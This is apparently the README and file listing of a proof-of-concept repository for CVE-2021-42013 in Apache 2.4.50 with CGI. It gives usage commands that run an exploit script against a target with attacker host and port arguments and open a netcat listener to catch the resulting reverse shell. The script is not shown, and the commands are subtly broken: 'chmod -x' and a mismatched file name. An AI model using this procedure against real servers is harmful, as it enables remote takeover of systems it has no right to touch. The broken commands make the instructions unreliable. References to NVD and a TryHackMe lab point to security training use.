PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI# CVE-2021-42013_Reverse-Shell
PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI
## Usage :
```sh
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT
```
### More info:
```sh
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:8083 10.0.000.000 9999
nc -lvnp 9999
```
### References
https://nvd.nist.gov/vuln/detail/CVE-2021-42013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
https://tryhackme.com/room/cve202141773
[4.0K] /data/pocs/82494d59df3f107415a98d52954348db9b934afe
├── [ 509] CVE-2021-42013_reverseshell.sh
└── [ 515] README.md
0 directories, 2 files